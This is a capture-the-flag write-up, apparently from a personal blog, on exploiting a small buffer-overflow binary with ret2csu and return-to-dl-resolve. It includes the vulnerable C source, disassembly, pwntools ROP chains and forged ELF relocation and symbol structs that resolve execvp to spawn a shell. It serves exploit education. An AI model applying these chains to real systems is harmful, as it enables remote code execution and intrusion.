Dl Resolve Attack
Intro
During the last CTF I played I was working on a really nice challenge, which I think is worth a writeup. The challenge was called crySYS and all the materials can be found on my GitHub.
The challenge itself contained a simple buffer overflow and the goal was to get a shell on the server. Even the source code was given:
#include <stdio.h>
#include <unistd.h>
//gcc -o challenge -no-pie -fno-stack-protector challenges.c
//LD_PRELOAD=./libc-2.27.so ./ld-2.27.so ./challenge
int not_vulnerable() {
char buf[80];
return read(0, buf, 0x1000);
}
int main() {
not_vulnerable();
return 0;
}
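The compile command in the comment also tells us that there is no stack canary and no PIE, so the overflow can reach the return address and the addresses inside the binary are fixed. In other words, the binary is exploitable.
In the rest of this blog post I will describe my two attempts at solving it.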
Background Information
You might think: why don't we just do return2libc? I thought that at first as well, but for a return2libc attack you always need a leak, in this example the resolved address of read. From that you calculate the base address of the libc and then the address of system, execvp or whatever.
So for a return2libc attack we would need an address leak, but in this special case there is no resolved function which can leak anything. Only read is resolved. We could of course set up a write system call using a ROPchain, but this binary is so small that there are simply not enough gadgets.
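To make the dependency on a leak concrete, here is a minimal sketch of the arithmetic a return2libc attack relies on. The symbol offsets and the leaked address are made-up illustration values, not numbers taken from this challenge.

```python
# Hypothetical symbol offsets inside some libc build (illustration only).
LIBC_OFFSETS = {"read": 0x110070, "system": 0x4F440}

def libc_base_from_leak(leaked_addr, symbol):
    """Derive the libc load address from one leaked, already resolved symbol."""
    base = leaked_addr - LIBC_OFFSETS[symbol]
    # libc is mapped page-aligned, so a plausible base has its low 12 bits clear.
    if base & 0xFFF:
        raise ValueError("leak does not match the assumed libc")
    return base

leaked_read = 0x7F1234510070            # made-up runtime address of read
base = libc_base_from_leak(leaked_read, "read")
system_addr = base + LIBC_OFFSETS["system"]
print(hex(base), hex(system_addr))
```

Without a way to print the resolved address of read there is no leaked_read to start from, which is exactly the situation in this challenge.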
So the only attack I could come up with was return2dlresolve. There are already some good resources available regarding this attack:
- https://gist.github.com/ricardo2197/8c7f6f5b8950ed6771c1cd3a116f7e62
- https://www.rootnetsec.com/ropemporium-ret2csu/
- https://1ce0ear.github.io/2017/10/20/return-to-dl/
- https://ddaa.tw/hitcon_pwn_200_blinkroot.html
Tooling
For the exploit I use Python with pwntools. I have a patched version of pwntools which spawns radare2 instead of gdb when calling
gdb.attach(p, r2cmd="db {}".format(hex(offset)))
and which lets me pass it an r2 startup command. (I plan to open a PR on pwntools for this patch.)
For the binary analysis I am using IDA 7.5. It's just easy to read all the offsets from it, but as this binary is so small any other tool will be fine too.
return-to-dl-resolve?
This technique is pretty nice as it is independent of the libc version in use and it doesn't need a leak. All it requires is a ROPchain and a memory location we can write to.
To exploit it we are going to resolve the execvp function. We achieve this by creating all the structs the dynamic linker needs to resolve this function, and once it is resolved the linker will call it.
We need:
- forge structs: JMPREL entry, SYMTAB entry, STRTAB entry (we don't need to recreate everything exactly, just the bytes we need)
- write to a known address (we use bss segment)
- setup arguments for execvp call
- call dlresolve
- Hopefully having a shell at this point :)
First Attempt, simple ROP
To trigger the buffer overflow and call read again, this time to read in the forged structs, we use:
chain_read = b""
chain_read += b"A"*80 # overflow padding
chain_read += b"B"*8 # fake rbp
chain_read += p64(POP_RSI_POP_R15_RET) # set read buffer
chain_read += p64(C_AREA) # ptr to controllable buffer
chain_read += b"C"*8 # dummy r15 data
chain_read += p64(MOV_EDI_CALL_READ) # call read
chain_read += b"D"*16 # note end of chain
C_AREA is the address of the bss segment, which is 0x601030. IDA shows that this segment is only 8 bytes in size, but as memory is mapped in pages, we have the rest of the page for our structs, which is more than enough.
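How much room "the rest of the page" actually is can be checked with a few lines. This is only a sketch and assumes the usual 4 KiB page size on x86-64; the helper name is mine.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

def room_in_page(addr, page_size=PAGE_SIZE):
    """Return (start of the page containing addr, bytes from addr to the page end)."""
    page_start = addr & ~(page_size - 1)
    return page_start, page_start + page_size - addr

C_AREA = 0x601030
page_start, room = room_in_page(C_AREA)
print(hex(page_start), hex(room))
```

The forged structs built later in this post need a bit more than 100 bytes, so they fit comfortably.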
The two ROP gadgets simply set up the arguments: as it is a 64-bit binary, the three arguments for read are passed in the rdi, rsi and rdx registers.
This attempt can be found in exp_version_1.py. During debugging I noticed a problem: the read call is followed by these instructions:
.text:0000000000400500 E8 EB FE FF FF call _read
.text:0000000000400505 C9 leave
.text:0000000000400506 C3 retn
The leave instruction restores rsp from rbp, and we overwrote rbp with the overflow. Meaning we control where the ROPchain continues. This is kind of bad, we don't want this power. Because I found no way to set rbp to a reasonable address on the stack, we lose the rest of our ROPchain. Of course, what we could do is point rsp at the bss segment and write the rest of our ROPchain there. But I considered this unnecessary work, so I used a different approach: ret2csu.
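The effect of leave followed by retn can be modelled in a few lines. This is a toy model, not part of the exploit: memory is a plain dict, and both the pivot address 0x601800 and the gadget address 0x400583 are values I picked for illustration.

```python
def leave_ret(memory, rbp):
    """Model `leave; retn`: mov rsp, rbp / pop rbp / pop rip.

    `memory` maps addresses to 64-bit values; a missing key models a
    read from an unmapped address. Returns the new (rsp, rbp, rip).
    """
    rsp = rbp                 # leave, part 1: mov rsp, rbp
    new_rbp = memory[rsp]     # leave, part 2: pop rbp
    rsp += 8
    rip = memory[rsp]         # retn: pop rip
    rsp += 8
    return rsp, new_rbp, rip

# Fake rbp pointing into a buffer we filled beforehand: execution continues there.
pivot = {0x601800: 0, 0x601808: 0x400583}
print([hex(v) for v in leave_ret(pivot, 0x601800)])

# Fake rbp of "BBBBBBBB": rsp ends up at an unmapped address.
try:
    leave_ret(pivot, 0x4242424242424242)
except KeyError:
    print("crash: rsp points to unmapped memory")
```

The second case is what happens with the chain above, because the 8 bytes of "B" end up in rbp before the leave executes.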
Second Attempt, ret2csu
Instead of simply calling read via a ROPchain I used the ret2csu method to avoid losing track of the ROPchain.
All the gadgets needed can be found in the __libc_csu_init function. On program startup this function calls all functions from the .init_array section. These are things like constructors or the initialization of global variables, basically everything which has to be ready before the main function is called.
The part of the function we need is:
.text:0000000000400560 4C 89 FA mov rdx, r15
.text:0000000000400563 4C 89 F6 mov rsi, r14
.text:0000000000400566 44 89 EF mov edi, r13d
.text:0000000000400569 41 FF 14 DC call [r12+rbx*8]
.text:000000000040056D 48 83 C3 01 add rbx, 1
.text:0000000000400571 48 39 DD cmp rbp, rbx
.text:0000000000400574 75 EA jnz short loc_400560
.text:0000000000400576 48 83 C4 08 add rsp, 8
.text:000000000040057A 5B pop rbx
.text:000000000040057B 5D pop rbp
.text:000000000040057C 41 5C pop r12
.text:000000000040057E 41 5D pop r13
.text:0000000000400580 41 5E pop r14
.text:0000000000400582 41 5F pop r15
.text:0000000000400584 C3 retn
We split it into two gadgets: the first one starts at 0x400560 and contains the function call, the second one starts at 0x40057A and is the one we use to set up the registers needed for the call at 0x400569.
As we can see there is no leave instruction, so nothing messes with rsp. The add rsp, 8 and the six pops after it only consume stack slots, which we can easily fill with padding.
The ROPchain we will use is:
C_AREA = 0x601030
CSU_RET = 0x40057A
CSU_CALL = 0x400560
RELOC_READ = 0x601018
chain_read = b"A"*80 # overflow padding
chain_read += b"B"*8 # fake rbp
chain_read += p64(CSU_RET) # gadget: pop rbx, rbp, r12-r15; retn
chain_read += p64(0) # RBX (to get "call [r12]")
chain_read += p64(1) # RBP (to pass cmp rbp, rbx after call)
chain_read += p64(RELOC_READ) # R12 (read GOT entry, so call [r12] calls read)
chain_read += p64(0) # R13 (has to be zero for stdin read)
chain_read += p64(C_AREA) # R14 (ptr to controllable buffer)
chain_read += p64(0x100) # R15 (amount we want to read)
chain_read += p64(CSU_CALL)
chain_read += b"D"*56 # filler for add rsp,8 and the six pops before retn
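The same chain can be wrapped in a small reusable helper. This is a sketch under my own naming (ret2csu_call is not a pwntools function), with struct.pack standing in for p64 so that it runs without pwntools. The filler size follows from the listing above: after the call returns, add rsp, 8 and six pops consume 56 bytes before retn picks up the next address.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian value (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

def ret2csu_call(csu_pop, csu_call, func_ptr, edi, rsi, rdx):
    """Build a chain that executes `call [func_ptr]` with three arguments.

    The returned bytes end exactly where the next return address goes.
    """
    chain = p64(csu_pop)
    chain += p64(0)          # rbx = 0, so the call target is [r12 + 0*8]
    chain += p64(1)          # rbp = 1, equal to rbx after `add rbx, 1`
    chain += p64(func_ptr)   # r12 = address holding the function pointer
    chain += p64(edi)        # r13 -> edi (only the low 32 bits are copied)
    chain += p64(rsi)        # r14 -> rsi
    chain += p64(rdx)        # r15 -> rdx
    chain += p64(csu_call)
    chain += b"D" * (8 + 6 * 8)  # add rsp, 8 plus six pops before retn
    return chain

chain = ret2csu_call(0x40057A, 0x400560, 0x601018, 0, 0x601030, 0x100)
print(len(chain))
```

Prefixing this with the 88 bytes of overflow padding gives the read stage; whatever is appended afterwards is the next gadget to run.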
This will call read, and we can pass our forged structs into it. After the read we continue and call the resolver.
Creating the Structs
This is the difficult part, I think. The resolver needs these structs to correctly resolve execvp. It works as follows (only a short description, as there is plenty of material online).
A call to read goes through the .plt section:
.plt:00000000004003F0 ; ssize_t read(int fd, void *buf, size_t nbytes)
.plt:00000000004003F0 FF 25 22 0C 20 00 jmp cs:off_601018
.plt:00000000004003F6 68 00 00 00 00 push 0
.plt:00000000004003FB E9 E0 FF FF FF jmp resolver_4003E0
The jmp at address 4003F0 jumps to the address stored in read's slot in the GOT (0x601018). If read is already resolved, it jumps directly to its implementation. If not, the slot still points back to 4003F6, which pushes zero on the stack. This is the relocation argument: it defines at which index in the JMPREL Relocation Table the read entry can be found. In this case it is zero, meaning that read is the first entry.
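The targets in these listings can be recomputed from the raw instruction bytes, which is a handy sanity check when reading offsets by hand. A small sketch (the helper name is mine): all three instructions carry a signed 32-bit displacement relative to the address of the next instruction.

```python
import struct

def rip_relative_target(insn_addr, insn_bytes, disp_offset):
    """Resolve a signed 32-bit displacement relative to the next instruction."""
    (disp,) = struct.unpack_from("<i", insn_bytes, disp_offset)
    return insn_addr + len(insn_bytes) + disp

# jmp cs:off_601018 at 0x4003F0 (FF 25 disp32): address of the GOT slot
got_slot = rip_relative_target(0x4003F0, bytes.fromhex("FF25220C2000"), 2)
# jmp resolver_4003E0 at 0x4003FB (E9 rel32): start of the resolver stub
resolver = rip_relative_target(0x4003FB, bytes.fromhex("E9E0FFFFFF"), 1)
# call _read at 0x400500 (E8 rel32): the PLT entry of read
read_plt = rip_relative_target(0x400500, bytes.fromhex("E8EBFEFFFF"), 1)
print(hex(got_slot), hex(resolver), hex(read_plt))
```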
Verifying the relocation entry in IDA (bytes omitted):
LOAD:00000000004003B0 ; ELF JMPREL Relocation Table
LOAD:00000000004003B0 Elf64_Rela <601018h, 100000007h, 0> ; R_X86_64_JUMP_SLOT read
Yes, that's the case. The values in the JMPREL entry are the address where the resolved address gets stored, and r_info (rel_info), which holds the relocation type in its lower 32 bits and the index into the symbol table in its upper 32 bits. The index is calculated by shifting r_info 32 bits to the right, so in this case it's 100000007h >> 32 = 1. So it's the second entry in the symbol table.
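The split of r_info is simple enough to write down as code. A minimal sketch with helper names of my own choosing:

```python
R_X86_64_JUMP_SLOT = 7

def split_r_info(r_info):
    """Elf64 r_info -> (symbol table index, relocation type)."""
    return r_info >> 32, r_info & 0xFFFFFFFF

def make_r_info(sym_index, rel_type=R_X86_64_JUMP_SLOT):
    """Inverse of split_r_info, used later when forging an entry."""
    return (sym_index << 32) | rel_type

print(split_r_info(0x100000007))
```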
Verifying the symbol table entry in IDA (bytes omitted):
LOAD:00000000004002B8 ; ELF Symbol Table
LOAD:00000000004002B8 Elf64_Sym <0>
LOAD:00000000004002D0 Elf64_Sym <0Bh, 12h, 0, 0, 0, 0> ; "read"
LOAD:00000000004002E8 Elf64_Sym <10h, 12h, 0, 0, 0, 0> ; "__libc_start_main"
LOAD:0000000000400300 Elf64_Sym <2Eh, 20h, 0, 0, 0, 0> ; "__gmon_start__"
Yes, looks good (the first entry is always zero, by the way). The first field of each entry is the offset of the symbol name in the string table. So the read string starts at offset 11 (0Bh) in the STRTAB.
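For reference, this is how the 24 bytes of an Elf64_Sym entry are laid out, sketched with Python's struct module. The field order follows the ELF64 definition; describe_sym is a helper name I made up for this illustration.

```python
import struct

# st_name (u32), st_info (u8), st_other (u8), st_shndx (u16), st_value (u64), st_size (u64)
ELF64_SYM = struct.Struct("<IBBHQQ")

def describe_sym(raw):
    """Decode the fields of one Elf64_Sym entry that matter here."""
    st_name, st_info, st_other, _shndx, _value, _size = ELF64_SYM.unpack(raw)
    return {
        "st_name": st_name,          # offset of the name in the string table
        "bind": st_info >> 4,        # 1 = STB_GLOBAL, 2 = STB_WEAK
        "type": st_info & 0xF,       # 2 = STT_FUNC, 0 = STT_NOTYPE
        "visibility": st_other & 3,  # 0 = STV_DEFAULT
    }

read_sym = ELF64_SYM.pack(0x0B, 0x12, 0, 0, 0, 0)   # the "read" entry from IDA
print(ELF64_SYM.size, describe_sym(read_sym))
```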
Verifying the string table offset in IDA (bytes omitted):
LOAD:0000000000400318 ; ELF String Table
LOAD:0000000000400318 byte_400318 db 0
LOAD:0000000000400319 aLibcSo6 db 'libc.so.6',0
LOAD:0000000000400323 aRead db 'read',0
LOAD:0000000000400328 aLibcStartMain db '__libc_start_main',0
LOAD:000000000040033A aGlibc225 db 'GLIBC_2.2.5',0
LOAD:0000000000400346 aGmonStart db '__gmon_start__',0
0x23 - 0x18 = 11, so that matches too. Nothing more is needed. We need to push the correct index on the stack before calling the resolver. This index has to point into the bss segment, where our forged JMPREL entry lies. This entry has to contain a valid GOT address, for which we reuse the one from read, and an r_info whose symbol index also points into the bss segment, at our forged symbol table entry. And last, the symbol table entry needs a valid offset from the string table to our execvp string.
All of this is calculated as follows:
FORGED_AREA = C_AREA + 0x20 # space for sh\x00 string
# calculate relocation index
rel_offset = (FORGED_AREA - JMPREL) // 24 # distance must be an exact multiple of 24
elf64_sym_struct = FORGED_AREA + 0x28 # address of the forged sym struct
index_sym = (elf64_sym_struct - SYMTAB) // 24 # calculate symbol table index
r_info = (index_sym << 32) | 0x7 # 7 -> plt relocation type
elf64_jmprel_struct = p64(bin_elf.got['read']) # just reuse read GOT address
elf64_jmprel_struct += p64(r_info)
elf64_jmprel_struct += p64(0)
elf64_jmprel_struct += b"P"*16 # pad to size 40 for second 24 division
st_name = (elf64_sym_struct + 0x20) - STRTAB # offset to "execvp"
elf64_sym_struct = p64(st_name) + p64(0x12) + p64(0) + p64(0)
# putting structs together
chain_structs = b"sh\x00" # sh string, file argument for execvp
chain_structs += p64(0) # for execvp argv pointer
chain_structs += b"P"*21 # padding
chain_structs += elf64_jmprel_struct # forged jmprel entry struct
chain_structs += elf64_sym_struct # forged symbol table struct
chain_structs += b"execvp\x00" # function to resolve
chain_structs += b"X"*17 # end of forged struct
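It's important to note that each forged entry has to sit at an exact multiple of 24 bytes from the start of its table (JMPREL and SYMTAB respectively), as those entries are 24 bytes in size and the resolver addresses them by index.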
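The divisibility requirement is easy to get wrong when moving structs around, so a check that fails loudly is useful. A sketch using the addresses from the IDA listings above; table_index is a helper name of my own.

```python
ENTRY_SIZE = 24      # size of an Elf64_Rela and of an Elf64_Sym entry

JMPREL = 0x4003B0    # from the IDA listing
SYMTAB = 0x4002B8    # from the IDA listing
C_AREA = 0x601030    # bss address used in this post

def table_index(table_base, entry_addr, entry_size=ENTRY_SIZE):
    """Index of entry_addr in the table, or ValueError if it is not reachable."""
    index, rest = divmod(entry_addr - table_base, entry_size)
    if rest:
        raise ValueError(
            "%#x is %d bytes past a %d-byte boundary" % (entry_addr, rest, entry_size)
        )
    return index

forged_rela = C_AREA + 0x20          # same layout as in the code above
forged_sym = forged_rela + 0x28
rel_offset = table_index(JMPREL, forged_rela)
index_sym = table_index(SYMTAB, forged_sym)
print(rel_offset, index_sym)
```

If either address is off, the helper reports by how many bytes, which tells you how much padding to add in front of the struct.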
Final Stage
Now we have all the pieces. The last step is to call the resolver and trigger the resolving of execvp. This is done using a simple ROPchain:
chain_read += p64(POP_RDI) # set execvp file arg
chain_read += p64(C_AREA) # sh string
chain_read += p64(POP_RSI_POP_R15_RET) # empty args str
chain_read += p64(C_AREA+2) # null ptr arg to execvp
chain_read += b"R"*8 # dummy r15
chain_read += p64(RESOLVER_ADDR) # call resolver
chain_read += p64(rel_offset) # reloc_index arg
chain_read += b"E"*16 # end of chain
Of course, before calling the resolver we have to set up the arguments for execvp, as the resolver calls it after successfully resolving it.
The resolver works in two steps. First _dl_runtime_resolve is called, which saves all the registers on the stack and prepares the call to _dl_fixup. This function accesses the entries of our forged structs and calls _dl_lookup_symbol_x, which then resolves our function.
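Before throwing the payload at the real resolver, the pointer chase can be dry-run offline. The following is a simplified model of my own, not glibc code: it rebuilds the forged structs with the layout from this post, then follows reloc index, relocation entry, symbol entry and name string the way _dl_fixup does, skipping the version check and the actual symbol lookup.

```python
import struct

JMPREL, SYMTAB, STRTAB = 0x4003B0, 0x4002B8, 0x400318  # from the IDA listings
C_AREA = 0x601030                                       # where the payload lands
READ_GOT = 0x601018

def p64(value):
    return struct.pack("<Q", value)

def build_payload():
    """Rebuild the forged structs; returns (payload bytes, reloc index)."""
    forged_rela = C_AREA + 0x20
    forged_sym = forged_rela + 0x28
    r_info = (((forged_sym - SYMTAB) // 24) << 32) | 7
    st_name = forged_sym + 0x20 - STRTAB
    payload = b"sh\x00" + p64(0) + b"P" * 21
    payload += p64(READ_GOT) + p64(r_info) + p64(0) + b"P" * 16
    payload += p64(st_name) + p64(0x12) + p64(0) + p64(0)
    payload += b"execvp\x00"
    return payload, (forged_rela - JMPREL) // 24

payload, reloc_index = build_payload()

def read_mem(addr, size):
    """Only the payload is mapped in this model; anything else is a fault."""
    start = addr - C_AREA
    if start < 0 or start + size > len(payload):
        raise MemoryError(hex(addr))
    return payload[start:start + size]

def walk_like_dl_fixup(reloc_index):
    """Follow reloc index -> Elf64_Rela -> Elf64_Sym -> name string."""
    r_offset, r_info = struct.unpack("<QQ", read_mem(JMPREL + 24 * reloc_index, 16))
    sym_addr = SYMTAB + 24 * (r_info >> 32)
    st_name, _st_info, st_other = struct.unpack("<IBB", read_mem(sym_addr, 6))
    name = bytearray()
    addr = STRTAB + st_name
    while True:
        byte = read_mem(addr, 1)
        if byte == b"\x00":
            break
        name += byte
        addr += 1
    return r_offset, r_info & 0xFFFFFFFF, st_other & 3, name.decode()

print(walk_like_dl_fixup(reloc_index))
```

If any of the offsets is wrong, the walk either raises MemoryError or returns a garbage name, which is much easier to debug than a crash inside the dynamic linker.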
Running the completed exploit exp_version_3.py returns a shell.
Final Notes
This technique was really nice to exploit, and it’s a bit advanced I would say.
The one thing which did not work until the end is that _dl_fixup contains this version check:
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
{
const ElfW(Half) *vernum = (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0)
version = NULL;
}
I patched this to be NULL manually in the debugger. I leave it as an exercise to the reader to figure out how to pass this check, because if it is not avoided the exploit will die with a SEGFAULT on the vernum[ELFW(R_SYM) (reloc->r_info)] dereference.
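Why this dereference faults can be seen from the address arithmetic alone. The sketch below is an illustration under assumptions: the DT_VERSYM address and the two mapped ranges are hypothetical placeholders (read the real ones from the binary and /proc/PID/maps), while the symbol index 87528 is (0x601078 - 0x4002B8) / 24, the forged index from the layout in this post.

```python
VERNUM_ENTRY_SIZE = 2   # vernum is an array of ElfW(Half), i.e. 16-bit values

# Hypothetical values for illustration only.
VERSYM = 0x40035E                    # assumed DT_VERSYM address
MAPPED = [(0x400000, 0x401000),      # assumed text mapping
          (0x600000, 0x602000)]      # assumed data mapping

def vernum_address(r_info, versym=VERSYM):
    """Address read by vernum[ELFW(R_SYM)(reloc->r_info)]."""
    return versym + VERNUM_ENTRY_SIZE * (r_info >> 32)

def is_mapped(addr):
    return any(lo <= addr < hi for lo, hi in MAPPED)

legit = vernum_address(0x100000007)           # read's real relocation entry
forged = vernum_address((87528 << 32) | 7)    # our forged relocation entry
print(hex(legit), is_mapped(legit))
print(hex(forged), is_mapped(forged))
```

With a symbol index this large the read lands far behind the version table, in the gap between the binary's mappings, so the check has to be bypassed or the index has to land somewhere readable.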